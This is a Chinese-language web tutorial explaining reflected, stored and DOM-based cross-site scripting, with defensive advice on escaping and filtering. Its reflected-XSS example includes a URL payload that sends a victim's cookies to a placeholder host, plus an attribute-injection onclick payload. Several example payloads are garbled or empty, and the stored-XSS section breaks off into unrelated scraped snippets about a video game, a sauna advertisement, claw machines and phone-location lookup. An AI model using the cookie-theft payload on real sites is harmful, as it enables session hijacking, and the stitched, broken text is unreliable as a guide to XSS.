XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是:
1. Reflected XSS(基于反射的XSS攻击)
2. Stored XSS(基于存储的XSS攻击)
3. DOM-based or local XSS(基于DOM或本地的XSS攻击)
Reflected XSS
基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击。
例子:
1. 做个假设,当亚马逊在搜索书籍,搜不到书的时候显示提交的名称。
2. 在搜索框搜索内容,填入“”, 点击搜索。
3. 当前端页面没有对返回的数据进行过滤,直接显示在页面上, 这时就会alert那个字符串出来。
4. 进而可以构造获取用户cookies的地址,通过 *** 群或者垃圾邮件,来让其他人点击这个地址:
1 | http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookiescript> |
S:这个地址当然是没效的,只是举例子而已。
结论:
如果只是1、2、3步做成功,那也只是自己折腾自己而已,如果第4步能做成功,才是个像样的XSS攻击。
开发安全措施:
1. 前端在显示服务端数据时候,不仅是标签内容需要过滤、转义,就连属性值也都可能需要。
2. 后端接收请求时,验证请求是否为攻击请求,攻击则屏蔽。
例如:
标签:
1 |
转义
1 | #39;handsome boy')> |
属性:
如果一个input的value属性值是
1 | 琅琊榜" onclick="javascript:alert('handsome boy') |
就可能出现
1 | "text"value="琅琊榜"onclick="javascript:alert('handsome boy')"> |
点击input导致攻击脚本被执行,解决方式可以对script或者双引号进行过滤。
Stored XSS
基于存储的XSS攻击,是通过发表带有恶意跨域脚本的帖子/文章,从而把恶意脚本存储在服务器,每个访问该帖子/文章的人就会触发执行。
例子:
本文目录一览: 1、看门狗2完成黑客挑战任务怎么做 2、看门狗2骇入世界离开伽利略公司之后去哪个黑客空间 3、看门狗2黑客入侵怎么玩 黑客入侵玩法攻略 4、看门狗二的住的房子在哪里 5...
上海桑拿洗浴保健养生,觉得非常棒 上海桑拿洗浴保健养生,觉得非常棒 【上海男士养生会所】是一家集美容护肤、推拿、推拿按摩、SPA、健康养生、缓解压力为一体的技术专业养生会所。务求私人订制专享打造...
本文导读目录: 1、如何简单制作抓娃娃机 2、网传抓娃娃机技巧是真的,还是套路? 3、黑客是怎么破解抓娃娃机的? 4、娃娃机的涉及原理究竟是什么? 5、网络抓娃娃是正规的创业项目吗?...
当今有一种文件传送方法不易操纵,便是两部电脑上根据一根网络线紧邻互相传送数据,资询了下不来30尾款手机软件,也没有操纵这类文件传送的作用。如今销售市场上的物质大多数是根据操纵USB端口号、抑制QQ发文...
输入手机号怎么查定位(联系不上人怎么查定位)小伙伴们好,文章开始前,先和大家说句悄悄话—— 由于微信更改了推送规则,推文将不再按照时间线显示,若不点击“在看”或者不“星标”,可能将无法看到我们...
每天的蚂蚁庄园里,我们可以回答庄园小课堂的问题,如果正确回答就能获得小鸡的饲料哦。5月25日每日问题是:夏天给狗狗剃光毛,有助于让狗狗降温吗?关于这个问题的答案很多玩家都不太知道,如果大家不清楚的话,...